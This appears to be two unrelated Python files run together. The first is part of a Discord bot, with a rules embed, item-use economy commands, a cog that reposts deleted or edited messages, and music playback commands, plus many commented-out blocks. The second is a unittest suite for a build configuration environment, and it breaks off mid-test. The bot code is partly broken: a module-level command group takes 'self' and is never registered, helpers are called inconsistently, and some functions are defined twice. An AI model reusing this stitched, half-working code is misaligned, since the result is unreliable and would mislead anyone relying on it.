    """Post the server rules embed (10 s per-user cooldown)."""
    embed = discord.Embed(color = discord.Color.blue())
    embed.set_author(name='Rules📓')
    embed.add_field(name='1.', value=' Please dont talk about religion or politics. People can be really sensitive about this stuff, so dont do it here, thanks!')
    embed.add_field(name='2.', value='No NSFW, sexist, racist, homophobic, transphobic, misogynistic or inappropriate content or anything remotely similar. Respect people, its the 21st century. This includes any slurs.')
    embed.add_field(name='3.', value='Causing drama is an instant punishment. Its simple, please dont.',)
    # NOTE(review): the numbering jumps from 3 to 6 — rules 4 and 5 appear
    # to be missing; confirm against the full rule list.
    embed.add_field(name='6', value='Attempting to override a punishment or using alternate accounts will lead to all your accounts being banned. This includes leaving to bypass a mute.',)
    embed.add_field(name='7', value='Please keep discussion in English only. This includes voice chats.',)
    embed.add_field(name='8', value='Dont spam or use copy pastes here. Theyre not nice and make chat hard to manage.')
    embed.add_field(name='9', value='Absolutely no advertising will be allowed without prior permission from a moderator. This includes YouTube videos, Twitch channels & Discord servers. Please dont link Zoom, Google Meet, or similar services too, as well as advertising art commissions.',)
    embed.set_thumbnail(url="https://pbs.twimg.com/profile_images/1149577551708184576/6KG41LLu_400x400.jpg")
    embed.set_footer(text="Imagine not voting for this bot in top.gg")
    await ctx.send(embed=embed)
# async def on_message(message):
# if bot.user == message.author:
# return
# if message.channel.id == 842336034431827988:
# msg = message.content
# key = os.getenv('key')
# header = {"x-api-key": key}
# dev_name = "ChaoticNebula"
# type = "stable"
# params = {'type':type , 'message':msg, 'dev_name': "ChaoticNebula", 'bot_name': "Ai Chat"}
# async with aiohttp.ClientSession(headers=header) as session:
# async with session.get(f'https://api.pgamerx.com/v3/ai/response', params=params) as resp:
# text = await resp.json()
# await message.channel.send(text[0]["message"])
# else:
# pass
#test
#if this works then WOW
# NOTE(review): this group takes `self` but is defined at module level (no
# enclosing cog is visible here) and is never attached via bot.add_cog in
# this region — it looks copy-pasted from a cog; confirm it is actually
# registered anywhere.
@commands.group(invoke_without_command=True)
async def use(self, ctx):
    # invoke_without_command=True routes bare "use" invocations (no
    # subcommand) to this fallback reply.
    await ctx.send("You need to specify an item to use.")
@use.command()
@commands.cooldown(1, 15, commands.BucketType.user)
async def watch(self, ctx):
    """Use a watch item: random chance of a tip, nothing, or losing the watch."""
    await self.open_account(ctx.author)
    owned = await self.item_func(ctx.author, "watch")
    if owned[0] < 1:
        await ctx.send("You can't use a watch that you don't have!")
        return
    roll = random.randint(0, 3)
    if roll == 1:
        await ctx.send("You tried to give someone the time, but they didn't give a shit.")
    elif roll == 2:
        # The watch breaks: remove one from the inventory.
        await ctx.send("Someone got angry at you and smashed your watch.")
        await self.item_func(ctx.author, "watch", -1)
    else:
        tip = random.randint(0, 50)
        await ctx.send(f"You gave someone the time and they gave you a {tip} moner tip!")
        await self.update_bank(ctx.author, tip)
@use.command()
@commands.cooldown(1, 30, commands.BucketType.user)
async def laptop(self, ctx):
    """Use a laptop item: random chance to win moners, lose a game, or break it."""
    # NOTE(review): unlike `watch`, these helpers are called without `self` —
    # confirm which form is correct for this file.
    await open_account(ctx.author)
    amount = await item_func(ctx.author, "laptop")
    if amount[0] < 1:
        await ctx.send("You can't use a computer that you don't have!")
    else:
        chance = random.randint(0, 3)
        games = ["Rocket League", "Minecraft", "Minceraft", "Call of Duty: Modern Warfare",
        "Call of Duty: Cold War", "Super Mario Bros.", "Super Mario Galaxy", "Mario Kart", "Halo 3", "Doom",
        "CS:GO", "Overwatch", "Rainbow Six: Siege", "Uno With Friends", "Dark Souls", "<NAME>", "The Witcher",
        "Snake"]
        if chance == 2:
            await ctx.send(f"You lost {random.choice(games)} and smashed your computer.")
            # BUG FIX: the inventory check above uses item name "laptop", but
            # this decremented a "computer" item, so the laptop was never lost.
            await item_func(ctx.author, "laptop", -1)
        elif chance == 1:
            await ctx.send(f"You lost {random.choice(games)} but decided not to lose your temper.")
        else:
            reward = random.randint(1, 2000)
            await ctx.send(f"You won {random.choice(games)} and got rewarded with {reward} moners!")
            await update_bank(ctx.author, reward)
@bot.command()
async def hi2(ctx):
    """Simple liveness-check command."""
    reply = "it worked"
    await ctx.send(reply)
@bot.command() # Normal message wait_for
async def testm(ctx):
    """Demo of bot.wait_for: ask a yes/no question and react to the reply."""
    await ctx.send("Do you want me to say hi? `(y/n)`")
    # Only accept a reply from the original invoker in the same channel;
    # previously any message from anyone anywhere satisfied the wait.
    def check(m):
        return m.author == ctx.author and m.channel == ctx.channel
    try:
        msg = await bot.wait_for('message', timeout=15.0, check=check)
    except asyncio.TimeoutError:
        # BUG FIX: the 15s timeout previously raised an unhandled
        # asyncio.TimeoutError instead of answering.
        await ctx.send("ok i wont")
        return
    if msg.content == 'y':
        await ctx.send("hi")
    else:
        await ctx.send("ok i wont")
# if ctx.channel.is_nsfw() == True:
# pass
# else:
# await ctx.send("Imagine wanting to look at nsfw things IN A PUBLIC CHAT")
# return
# if ransub.is_self:
# embed = discord.Embed(title=f"{ransub.author}'s Post", colour=ctx.author.colour)
# embed.add_field(name=ransub.title, value=ransub.selftext)
# embed.set_footer(text=f"❤ {ransub.ups} | 💬 {ransub.num_comments}")
# else:
# embed = discord.Embed(title=ransub.title, colour=ctx.author.colour, url=ransub.url)
# embed.set_footer(text=f"Posted by {ransub.author} on Reddit. | ❤ {ransub.ups} | 💬 {ransub.num_comments}")
# embed.set_image(url=ransub.url)
# await message.delete()
# await ctx.send(embed=embed)
# except:
# await ctx.send("Something went wrong. This may be the fact that the subreddit does not exist or is locked.")
class snipe(commands.Cog, description="snipe commands"):
    """Caches the most recent deleted/edited message per channel for ~60s
    so it can be retrieved with the snipe/editsnipe commands."""
    def __init__(self, bot):
        self.bot = bot
        self.index = 0
        # channel.id -> [content, author] for the last deleted message
        self.snipe_cache = {}
        # channel.id -> {"before": [content, author], "after": [content, author]}
        self.esnipe_cache = {}
    @commands.Cog.listener()
    async def on_message_edit(self, before, after):
        """Cache an edited message (bots excluded) and expire it after 60s."""
        if before.author.bot:
            return
        entry = {
            "before": [before.content, before.author],
            "after": [after.content, after.author],
        }
        self.esnipe_cache[before.channel.id] = entry
        await asyncio.sleep(60)
        # BUG FIX: only expire the entry this coroutine stored; previously an
        # older timer could evict a newer edit cached in the same channel.
        if self.esnipe_cache.get(before.channel.id) is entry:
            self.esnipe_cache.pop(before.channel.id, None)
    @commands.Cog.listener()
    async def on_message_delete(self, message):
        """Cache a deleted message (bots excluded) and expire it after 60s."""
        if message.author.bot:
            return
        entry = [message.content, message.author]
        self.snipe_cache[message.channel.id] = entry
        await asyncio.sleep(60)
        # Same stale-timer guard as on_message_edit.
        if self.snipe_cache.get(message.channel.id) is entry:
            self.snipe_cache.pop(message.channel.id, None)
    @commands.command(name="snipe", brief="Retrieves a recent deleted message")
    async def snipe(self, ctx):
        """
        Acts like a message log, but for channel specific and command only.\n
        Only returns the most recent message.
        A bot's deleted message is ignored.
        """
        channel = ctx.channel
        author = ctx.author
        try:
            em = Embed(
                # BUG FIX: Embed has no "name" parameter — "title" is the
                # intended keyword, otherwise the heading never showed.
                title=f"Last deleted message in #{channel.name}",
                description=self.snipe_cache[channel.id][0],
                timestamp=datetime.datetime.utcnow(),
                colour=discord.Color.random(),
            )
            em.set_author(
                name=f"{self.snipe_cache[channel.id][1]}",
                icon_url=f"{self.snipe_cache[channel.id][1].avatar_url}",
            )
            em.set_footer(text=f"Sniped by: {author}")
            return await ctx.send(embed=em)
        except KeyError:
            # Nothing cached for this channel (or the entry expired).
            return await ctx.send("There's nothing to snipe!")
    @commands.command(name="editsnipe", brief="Retrieves a recently edited message")
    async def editsnipe(self, ctx):
        """
        Same as `snipe`, but for edited messages.
        A bot's edited message is ignored.
        """
        channel = ctx.channel
        author = ctx.author
        try:
            em = Embed(
                # Same "name" -> "title" fix as in snipe above.
                title=f"Last edited message in #{channel.name}",
                description="**Before:**\n"
                f"+ {self.esnipe_cache[channel.id]['before'][0]}\n"
                f"\n**After:**\n- {self.esnipe_cache[channel.id]['after'][0]}",
                timestamp=datetime.datetime.utcnow(),
                colour=discord.Color.random(),
            )
            em.set_author(
                name=f"{self.esnipe_cache[channel.id]['before'][1]}",
                icon_url=f"{self.esnipe_cache[channel.id]['before'][1].avatar_url}",
            )
            em.set_footer(text=f"Sniped by: {author}")
            return await ctx.send(embed=em)
        except KeyError:
            return await ctx.send("There's nothing to snipe!")
@bot.command()
async def hi(ctx):
    """Simple liveness-check command."""
    reply = "it worked"
    await ctx.send(reply)
class Player(commands.Cog):
    """Voice cog: keeps a per-guild song queue and plays YouTube audio."""
    def __init__(self, bot):
        self.bot = bot
        # guild.id -> list of queued song URLs
        self.song_queue = {}
        self.setup()
    def setup(self):
        # Seed an empty queue for every guild known at startup.
        for guild in self.bot.guilds:
            self.song_queue[guild.id] = []
    async def check_queue(self, ctx):
        """Play the next queued song for this guild, if any (runs when a song ends)."""
        # BUG FIX: guilds joined after startup never get a queue from setup();
        # setdefault avoids a KeyError for them.
        queue = self.song_queue.setdefault(ctx.guild.id, [])
        if len(queue) > 0:
            ctx.voice_client.stop()
            await self.play_song(ctx, queue[0])
            queue.pop(0)
    async def search_song(self, amount, song, get_url=False):
        """Search YouTube for *song*; return a list of URLs (get_url=True),
        the raw extractor info, or None when nothing was found."""
        # youtube_dl blocks, so run it in an executor to keep the event loop responsive.
        info = await self.bot.loop.run_in_executor(None, lambda: youtube_dl.YoutubeDL({"format" : "bestaudio", "quiet" : True}).extract_info(f"ytsearch{amount}:{song}", download=False, ie_key="YoutubeSearch"))
        if len(info["entries"]) == 0: return None
        return [entry["webpage_url"] for entry in info["entries"]] if get_url else info
    async def play_song(self, ctx, song):
        """Stream *song* (a YouTube URL) on the guild's voice client."""
        url = pafy.new(song).getbestaudio().url
        # When playback finishes, schedule check_queue to advance the queue.
        ctx.voice_client.play(discord.PCMVolumeTransformer(discord.FFmpegPCMAudio(url)), after=lambda error: self.bot.loop.create_task(self.check_queue(ctx)))
        ctx.voice_client.source.volume = 0.5
    @commands.command()
    async def join(self, ctx):
        """Join the invoker's current voice channel."""
        connected = ctx.author.voice
        if not connected:
            await ctx.send("You need to be connected in a voice channel to use this command!")
            return
        # NOTE(review): the voice client is kept in a module-level global, so
        # this supports only one guild at a time — confirm that is intended.
        global vc
        vc = await connected.channel.connect()
class Fun(commands.Cog, description="Fun commands"):
    """Miscellaneous fun commands."""
    def __init__(self, bot):
        self.bot = bot
    @commands.command(aliases=["memes"], brief="Shows a meme from reddit")
    async def meme(self, ctx):
        """Fetch a random post from r/memes and send it as an embed."""
        async with self.bot.session() as cs:
            async with cs.get("https://www.reddit.com/r/memes/random/.json") as res:
                res = await res.json()
        # All interesting fields live under the first child's "data" mapping.
        post = res[0]["data"]["children"][0]["data"]
        link = f"https://reddit.com{post['permalink']}"
        em = Embed(colour=discord.Color.blurple(), title=post["title"], url=link)
        em.set_image(url=post["url"])
        em.set_footer(text=f"👍 {post['ups']} 👎 {post['downs']} 💬 {post['num_comments']}")
        await ctx.send(embed=em)
def setup(bot):
    """discord.py extension entry point: register the Fun cog on *bot*."""
    bot.add_cog(Fun(bot))
# @commands.command()
# async def play(self, ctx, *, song=None):
# if song is None:
# return await ctx.send("You must include a song to play.")
# if ctx.voice_client is None:
# return await ctx.send("I must be in a voice channel to play a song.")
# # handle song where song isn't url
# if not ("youtube.com/watch?" in song or "https://youtu.be/" in song):
# await ctx.send("Searching for song, this may take a few seconds.")
# result = await self.search_song(1, song, get_url=True)
# if result is None:
# return await ctx.send("Sorry, I could not find the given song, try using my search command.")
# song = result[0]
# if ctx.voice_client.source is not None:
# queue_len = len(self.song_queue[ctx.guild.id])
# if queue_len < 10:
# self.song_queue[ctx.guild.id].append(song)
# return await ctx.send(f"I am currently playing a song, this song has been added to the queue at position: {queue_len+1}.")
# else:
# return await ctx.send("Sorry, I can only queue up to 10 songs, please wait for the current song to finish.")
# await self.play_song(ctx, song)
# await ctx.send(f"Now playing: {song}")
@bot.command()
@commands.cooldown(1, 10, commands.BucketType.user)
async def music(ctx):
    """List the music-related commands in an embed."""
    embed = discord.Embed(color = discord.Color.blue())
    embed.set_author(name='Music commands')
    embed.add_field(name='+join', value='Joins the vc', inline=False)
    embed.add_field(name='+play (song name or url)', value='The bot plays the music example of use: +play rise or +play https://www.youtube.com/watch?v=fB8TyLTD7EE',
    inline=False)
    embed.add_field(name='+leave', value='Leaves the vc', inline=False)
    embed.add_field(name='+pause', value='pauses the current song playing', inline=False)
    embed.add_field(name='+resume', value='resumes the paused song', inline=False)
    # BUG FIX: '+about' and '+leave' were each listed twice; duplicates removed.
    embed.add_field(name='+about', value='Read some useless stuff', inline=False)
    embed.add_field(name='+loop', value='loops a song you specified', inline=False)
    embed.add_field(name='+queue', value='queue a song', inline=False)
    embed.add_field(name='+np', value='says the song currently playing', inline=False)
    embed.set_thumbnail(url="https://pbs.twimg.com/profile_images/1149577551708184576/6KG41LLu_400x400.jpg")
    embed.set_footer(text="not much in this command right?")
    await ctx.send(embed=embed)
music = DiscordUtils.Music()
@bot.command()
async def join(ctx):
    """Join the invoker's voice channel."""
    # BUG FIX: ctx.author.voice is None when the user is not in a voice
    # channel, which previously crashed with an AttributeError.
    if ctx.author.voice is None:
        await ctx.send("You need to be in a voice channel for me to join!")
        return
    await ctx.author.voice.channel.connect() #Joins author's voice channel
    embed=discord.Embed(title="Joined Voice Channel!", color=discord.Color.random())
    embed.set_footer(text="Consider voting for the bot")
    await ctx.send(embed=embed)
@bot.command()
async def leave(ctx):
    """Disconnect from the current voice channel."""
    # BUG FIX: ctx.voice_client is None when the bot is not connected,
    # which previously crashed with an AttributeError.
    if ctx.voice_client is None:
        await ctx.send("I'm not in a voice channel!")
        return
    await ctx.voice_client.disconnect()
    embed=discord.Embed(title="Left Voice Channel!", color=discord.Color.random())
    embed.set_footer(text="How are our music commands?")
    await ctx.send(embed=embed)
@bot.command()
async def play(ctx, *, url):
    """Play or queue a song (name or URL) via the shared DiscordUtils player."""
    player = music.get_player(guild_id=ctx.guild.id)
    if not player:
        player = music.create_player(ctx, ffmpeg_error_betterfix=True)
    if player is None:
        await ctx.send("I am not connected to a voice channel.")
        # BUG FIX: execution previously fell through after this message and
        # crashed on the None player / missing voice client.
        return
    if not ctx.voice_client.is_playing():
        await player.queue(url, search=True)
        song = await player.play()
        em=discord.Embed(title=f"Playing {song.name}", color=discord.Color.random())
        em.set_footer(text='Spread the word about stonk bot!')
        await ctx.send(embed=em)
        # (leftover debug "print(url)" removed)
    else:
        song = await player.queue(url, search=True)
        await ctx.send(f"Queued {song.name}")
@bot.command()
async def pause(ctx):
    """Pause the currently playing song."""
    player = music.get_player(guild_id=ctx.guild.id)
    paused = await player.pause()
    embed = discord.Embed(
        title=f"Paused {paused.name}",
        color=discord.Color.random(),
    )
    embed.set_footer(text='Invite stonk bot to other servers also')
    await ctx.send(embed=embed)
@bot.command()
async def resume(ctx):
    """Resume a previously paused song."""
    player = music.get_player(guild_id=ctx.guild.id)
    resumed = await player.resume()
    embed = discord.Embed(
        title=f'Resumed {resumed.name}',
        color=discord.Color.random(),
    )
    embed.set_footer(text='Vote for the bot')
    await ctx.send(embed=embed)
@bot.command()
async def stop(ctx):
    """Stop playback entirely for this guild."""
    await music.get_player(guild_id=ctx.guild.id).stop()
    await ctx.send("Stopped")
@bot.command()
async def loop(ctx):
    """Toggle looping of the current song."""
    player = music.get_player(guild_id=ctx.guild.id)
    song = await player.toggle_song_loop()
    state = "Enabled" if song.is_looping else "Disabled"
    await ctx.send(f"{state} loop for {song.name}")
@bot.command()
async def queue(ctx):
    """List the names of all currently queued songs."""
    player = music.get_player(guild_id=ctx.guild.id)
    names = [song.name for song in player.current_queue()]
    await ctx.send(", ".join(names))
@bot.command()
async def np(ctx):
    """Show the name of the song currently playing."""
    current = music.get_player(guild_id=ctx.guild.id).now_playing()
    await ctx.send(current.name)
@bot.command()
async def skip(ctx):
    """Force-skip the current song, reporting old and new tracks."""
    player = music.get_player(guild_id=ctx.guild.id)
    data = await player.skip(force=True)
    # Two entries means a next song started; one means playback just ended.
    if len(data) == 2:
        old, new = data
        await ctx.send(f"Skipped from {old.name} to {new.name}")
    else:
        await ctx.send(f"Skipped {data[0].name}")
@bot.command()
async def volume(ctx, vol):
    """Set playback volume; *vol* is a percentage (0-100)."""
    player = music.get_player(guild_id=ctx.guild.id)
    # The player expects a 0.0-1.0 float, so scale the percentage down.
    song, new_volume = await player.change_volume(float(vol) / 100)
    embed = discord.Embed(
        title=f"Changed volume for {song.name} to {new_volume*100}%",
        color=discord.Color.random(),
    )
    embed.set_footer(text='Invite stonk bot to other servers also')
    await ctx.send(embed=embed)
@bot.command()
async def remove(ctx, index):
    """Remove the song at the given queue *index*."""
    player = music.get_player(guild_id=ctx.guild.id)
    removed = await player.remove_from_queue(int(index))
    embed = discord.Embed(
        title=f"Removed {removed.name} from the queue",
        color=discord.Color.random(),
    )
    embed.set_footer(text='Do you even read these?')
    await ctx.send(embed=embed)
#keep_alive()
# Start the bot (blocking call). TOKEN is presumably defined earlier in the
# file — confirm it is loaded from the environment and never committed.
bot.run(TOKEN)
#bot.run(os.environ[TOKEN])
#@commands.command(aliases=["slots", "bet"])
#@<EMAIL>(rate=1, per=3.0, type=commands.BucketType.user)
#async def slot(self, ctx):
# """ Roll the slot machine """
#emojis = "🍎🍊🍐🍋🍉🍇🍓🍒"
#a = random.choice(emojis)
#b = random.choice(emojis)
#c = random.choice(emojis)
#slotmachine = f"**[ {a} {b} {c} ]\n{ctx.author.name}**,"
#if (a == b == c):
# await ctx.send(f"{slotmachine} All matching, you won! 🎉")
# elif (a == b) or (a == c) or (b == c):
# await ctx.send(f"{slotmachine} 2 in a row, you won! 🎉")
#else:
# await ctx.send(f"{slotmachine} No match, you lost 😢")
|
from __future__ import with_statement
import os, posixpath
from StringIO import StringIO
import unittest
from mozunit import main, MockedOpen
import ConfigStatus
from ConfigStatus import FileAvoidWrite
class ConfigEnvironment(ConfigStatus.ConfigEnvironment):
    """ConfigEnvironment that guarantees a 'top_srcdir' subst for unit tests."""
    def __init__(self, **args):
        ConfigStatus.ConfigEnvironment.__init__(self, **args)
        # Be helpful to unit tests
        if 'top_srcdir' not in self.substs:
            if os.path.isabs(self.topsrcdir):
                srcdir = self.topsrcdir
            else:
                srcdir = ConfigStatus.relpath(self.topsrcdir, self.topobjdir)
            # Normalize to forward slashes regardless of host separator.
            self.substs['top_srcdir'] = srcdir.replace(os.sep, '/')
class TestFileAvoidWrite(unittest.TestCase):
    """Exercises FileAvoidWrite: writes only reach disk when content changes."""
    def test_file_avoid_write(self):
        '''Test the FileAvoidWrite class
        '''
        with MockedOpen({'file': 'content'}):
            # Overwriting an existing file replaces its content
            with FileAvoidWrite('file') as out:
                out.write('bazqux')
            self.assertEqual(open('file', 'r').read(), 'bazqux')
            # Creating a new file (obviously) stores its content
            with FileAvoidWrite('file2') as out:
                out.write('content')
            self.assertEqual(open('file2').read(), 'content')

        class MyMockedOpen(MockedOpen):
            '''MockedOpen extension to raise an exception if something
            attempts to write in an opened file.
            '''
            def __call__(self, name, mode):
                if 'w' in mode:
                    # Parenthesized form is equivalent to the old
                    # "raise Exception, msg" statement syntax.
                    raise Exception('Unexpected open with write mode')
                return MockedOpen.__call__(self, name, mode)

        with MyMockedOpen({'file': 'content'}):
            # Validate that MyMockedOpen works as intended
            out = FileAvoidWrite('file')
            out.write('foobar')
            self.assertRaises(Exception, out.close)
            # Check that no write actually happens when writing the
            # same content as what already is in the file
            with FileAvoidWrite('file') as out:
                out.write('content')
class TestEnvironment(unittest.TestCase):
    """Checks the substitution values ConfigEnvironment computes automatically
    and the config file/header generation built on top of them."""
    def test_auto_substs(self):
        '''Test the automatically set values of ACDEFINES, ALLDEFINES
        and ALLSUBSTS.
        '''
        env = ConfigEnvironment(
            defines = [ ('foo', 'bar'), ('baz', 'qux 42'),
                        ('abc', 'def'), ('extra', 'foobar') ],
            non_global_defines = ['extra', 'ignore'],
            substs = [ ('FOO', 'bar'), ('ABC', 'def'),
                       ('bar', 'baz qux'), ('zzz', '"abc def"') ])
        # non_global_defines should be filtered out in ACDEFINES and
        # ALLDEFINES.
        # Original order of the defines need to be respected in ACDEFINES
        self.assertEqual(env.substs['ACDEFINES'], '''-Dfoo=bar -Dbaz=qux\ 42 -Dabc=def''')
        # ALLDEFINES, on the other hand, needs to be sorted
        self.assertEqual(env.substs['ALLDEFINES'], '''#define abc def
#define baz qux 42
#define foo bar''')
        # Likewise for ALLSUBSTS, which also mustn't contain ALLDEFINES
        # but contain ACDEFINES
        self.assertEqual(env.substs['ALLSUBSTS'], '''ABC = def
ACDEFINES = -Dfoo=bar -Dbaz=qux\ 42 -Dabc=def
FOO = bar
bar = baz qux
zzz = "abc def"''')
    def test_config_file(self):
        '''Test the creation of config files.
        '''
        # @foo@ is substituted (it is defined); @bar@ is left untouched.
        with MockedOpen({'file.in': '''#ifdef foo
@foo@
@bar@
'''}):
            env = ConfigEnvironment(substs = [ ('foo', 'bar baz') ])
            env.create_config_file('file')
            self.assertEqual(open('file', 'r').read(), '''#ifdef foo
bar baz
@bar@
''')
    def test_config_header(self):
        '''Test the creation of config headers.
        '''
        # Defined names get their values substituted into #define/#undef
        # lines; undefined ones are commented out.
        with MockedOpen({'file.in': '''
/* Comment */
#define foo
#define foo 42
#undef foo
#define bar
#define bar 42
#undef bar
# undef baz
#ifdef foo
# undef foo
# define foo 42
# define foo 42
#endif
'''}):
            env = ConfigEnvironment(defines = [ ('foo', 'baz qux'), ('baz', 1) ])
            env.create_config_header('file')
            self.assertEqual(open('file','r').read(), '''
/* Comment */
#define foo
#define foo baz qux
#define foo baz qux
#define bar
#define bar 42
/* #undef bar */
# define baz 1
#ifdef foo
# define foo baz qux
# define foo baz qux
# define foo baz qux
#endif
''')
# Tests for get_relative_srcdir, get_depth, get_input and get_file_srcdir,
# depending on various cases of top source directory and top build
# directory location.
class TestPaths(unittest.TestCase):
    """Shared fixtures for the path-handling test cases below."""
    def setUp(self):
        # A normalized absolute path and the leaf name of the current working
        # directory, used by subclasses to build their expected values.
        self.absolute = os.path.normpath('/absolute')
        cwd = os.path.abspath(os.curdir)
        self.dir = os.path.basename(cwd)
class TestPathsLocalBuildDir(TestPaths):
    """Path helpers when the build dir is the current directory ('.')."""
    def get_env(self, topsrcdir):
        """Build an env with topobjdir='.' and check srcdir/depth helpers."""
        env = ConfigEnvironment(topsrcdir = topsrcdir, topobjdir = '.')
        self.assertEqual(env.get_relative_srcdir('file'), '.')
        self.assertEqual(env.get_relative_srcdir('dir/file'), 'dir')
        self.assertEqual(env.get_relative_srcdir('deeply/nested/path/to/file'), 'deeply/nested/path/to')
        self.assertEqual(env.get_depth('file'), '.')
        self.assertEqual(env.get_depth('dir/file'), '..')
        self.assertEqual(env.get_depth('deeply/nested/path/to/file'), '../../../..')
        return env
    def test_paths_local_build_local_src(self):
        # topsrcdir = . ; topobjdir = .
        env = self.get_env('.')
        self.assertEqual(env.get_input('file'), 'file.in')
        self.assertEqual(env.get_input('dir/file'), os.path.join('dir', 'file.in'))
        self.assertEqual(env.get_top_srcdir('file'), '.')
        self.assertEqual(env.get_top_srcdir('dir/file'), '..')
        self.assertEqual(env.get_file_srcdir('file'), '.')
        self.assertEqual(env.get_file_srcdir('dir/file'), '../dir')
    def test_paths_local_build_parent_src(self):
        # topsrcdir = .. ; topobjdir = .
        env = self.get_env('..')
        self.assertEqual(env.get_input('file'), os.path.join('..', 'file.in'))
        self.assertEqual(env.get_input('dir/file'), os.path.join('..', 'dir', 'file.in'))
        self.assertEqual(env.get_top_srcdir('file'), '..')
        self.assertEqual(env.get_top_srcdir('dir/file'), '../..')
        self.assertEqual(env.get_file_srcdir('file'), '..')
        self.assertEqual(env.get_file_srcdir('dir/file'), '../../dir')
    def test_paths_local_build_absolute_src(self):
        # topsrcdir = /absolute ; topobjdir = /absolute
        env = self.get_env(self.absolute)
        self.assertEqual(env.get_input('file'), os.path.join(self.absolute, 'file.in'))
        self.assertEqual(env.get_input('dir/file'), os.path.join(self.absolute, 'dir', 'file.in'))
        self.assertEqual(env.get_input('%s/file' % self.dir), os.path.join(self.absolute, self.dir, 'file.in'))
        self.assertEqual(env.get_top_srcdir('file'), '/absolute')
        self.assertEqual(env.get_top_srcdir('dir/file'), '/absolute')
        # BUG FIX: the two lines below used the builtin `dir` instead of
        # `self.dir`, formatting "<built-in function dir>" into the paths.
        self.assertEqual(env.get_top_srcdir('%s/file' % self.dir), '/absolute')
        self.assertEqual(env.get_file_srcdir('file'), '/absolute')
        self.assertEqual(env.get_file_srcdir('dir/file'), '/absolute/dir')
        self.assertEqual(env.get_file_srcdir('%s/file' % self.dir), '/absolute/%s' % self.dir)
class TestPathsParentBuildDir(TestPaths):
    """Path helpers when the build dir is the parent directory ('..')."""
    def get_env(self, topsrcdir):
        """Build an env with topobjdir='..' and check srcdir/depth helpers
        (these do not depend on where topsrcdir is)."""
        env = ConfigEnvironment(topsrcdir = topsrcdir, topobjdir = '..')
        self.assertEqual(env.get_relative_srcdir('..'), '.')
        self.assertEqual(env.get_relative_srcdir('file'), self.dir)
        self.assertEqual(env.get_relative_srcdir('dir/file'), '%s/dir' % self.dir)
        self.assertEqual(env.get_relative_srcdir('deeply/nested/path/to/file'), '%s/deeply/nested/path/to' % self.dir)
        self.assertEqual(env.get_depth('../file'), '.')
        self.assertEqual(env.get_depth('file'), '..')
        self.assertEqual(env.get_depth('dir/file'), '../..')
        self.assertEqual(env.get_depth('deeply/nested/path/to/file'), '../../../../..')
        return env
    def test_paths_parent_build_parent_src(self):
        # topsrcdir = .. ; topobjdir = ..
        env = self.get_env('..')
        self.assertEqual(env.get_input('../file'), os.path.join('..', 'file.in'))
        self.assertEqual(env.get_input('file'), os.path.join('..', self.dir, 'file.in'))
        self.assertEqual(env.get_input('dir/file'), os.path.join('..', self.dir, 'dir', 'file.in'))
        self.assertEqual(env.get_top_srcdir('../file'), '.')
        self.assertEqual(env.get_top_srcdir('file'), '..')
        self.assertEqual(env.get_top_srcdir('dir/file'), '../..')
        self.assertEqual(env.get_file_srcdir('../file'), '.')
        self.assertEqual(env.get_file_srcdir('file'), '../%s' % self.dir)
        self.assertEqual(env.get_file_srcdir('dir/file'), '../../%s/dir' % self.dir)
    def test_paths_parent_build_ancestor_src(self):
        # topsrcdir = ../.. ; topobjdir = ..
        env = self.get_env('../..')
        self.assertEqual(env.get_input('../file'), os.path.join('..', '..', 'file.in'))
        self.assertEqual(env.get_input('file'), os.path.join('..', '..', self.dir, 'file.in'))
        self.assertEqual(env.get_input('dir/file'), os.path.join('..', '..', self.dir, 'dir', 'file.in'))
        self.assertEqual(env.get_top_srcdir('../file'), '..')
        self.assertEqual(env.get_top_srcdir('file'), '../..')
        self.assertEqual(env.get_top_srcdir('dir/file'), '../../..')
        self.assertEqual(env.get_file_srcdir('../file'), '..')
        self.assertEqual(env.get_file_srcdir('file'), '../../%s' % self.dir)
        self.assertEqual(env.get_file_srcdir('dir/file'), '../../../%s/dir' % self.dir)
    def test_paths_parent_build_absolute_src(self):
        # topsrcdir = /absolute ; topobjdir = ..
        env = self.get_env(self.absolute)
        self.assertEqual(env.get_input('../file'), os.path.join(self.absolute, 'file.in'))
        self.assertEqual(env.get_input('file'), os.path.join(self.absolute, self.dir, 'file.in'))
        self.assertEqual(env.get_input('dir/file'), os.path.join(self.absolute, self.dir, 'dir', 'file.in'))
        self.assertEqual(env.get_top_srcdir('../file'), '/absolute')
        self.assertEqual(env.get_top_srcdir('file'), '/absolute')
        self.assertEqual(env.get_top_srcdir('dir/file'), '/absolute')
        self.assertEqual(env.get_file_srcdir('../file'), '/absolute')
        self.assertEqual(env.get_file_srcdir('file'), '/absolute/%s' % self.dir)
        self.assertEqual(env.get_file_srcdir('dir/file'), '/absolute/%s/dir' % self.dir)
class TestPathsRelativeBuild(TestPaths):
    """Path helpers when the build dir is a relative subdirectory ('relative')."""
    def get_env(self, topsrcdir):
        """Build an env with topobjdir='relative' and check srcdir/depth
        helpers (these do not depend on where topsrcdir is)."""
        env = ConfigEnvironment(topsrcdir = topsrcdir, topobjdir = 'relative')
        self.assertEqual(env.get_relative_srcdir('relative/file'), '.')
        self.assertEqual(env.get_relative_srcdir('relative/dir/file'), 'dir')
        self.assertEqual(env.get_relative_srcdir('relative/deeply/nested/path/to/file'), 'deeply/nested/path/to')
        self.assertEqual(env.get_depth('relative/file'), '.')
        self.assertEqual(env.get_depth('relative/dir/file'), '..')
        self.assertEqual(env.get_depth('relative/deeply/nested/path/to/file'), '../../../..')
        return env
    def test_paths_relative_build_relative_src(self):
        # topsrcdir = relative ; topobjdir = relative
        env = self.get_env('relative')
        self.assertEqual(env.get_input('relative/file'), os.path.join('relative', 'file.in'))
        self.assertEqual(env.get_input('relative/dir/file'), os.path.join('relative', 'dir', 'file.in'))
        self.assertEqual(env.get_top_srcdir('relative/file'), '.')
        self.assertEqual(env.get_top_srcdir('relative/dir/file'), '..')
        self.assertEqual(env.get_file_srcdir('relative/file'), '.')
        self.assertEqual(env.get_file_srcdir('relative/dir/file'), '../dir')
    def test_paths_relative_build_local_src(self):
        # topsrcdir = . ; topobjdir = relative
        env = self.get_env('.')
        self.assertEqual(env.get_input('relative/file'), 'file.in')
        self.assertEqual(env.get_input('relative/dir/file'), os.path.join('dir', 'file.in'))
        self.assertEqual(env.get_top_srcdir('relative/file'), '..')
        self.assertEqual(env.get_top_srcdir('relative/dir/file'), '../..')
        self.assertEqual(env.get_file_srcdir('relative/file'), '..')
        self.assertEqual(env.get_file_srcdir('relative/dir/file'), '../../dir')
    def test_paths_relative_build_parent_src(self):
        # topsrcdir = .. ; topobjdir = relative
        env = self.get_env('..')
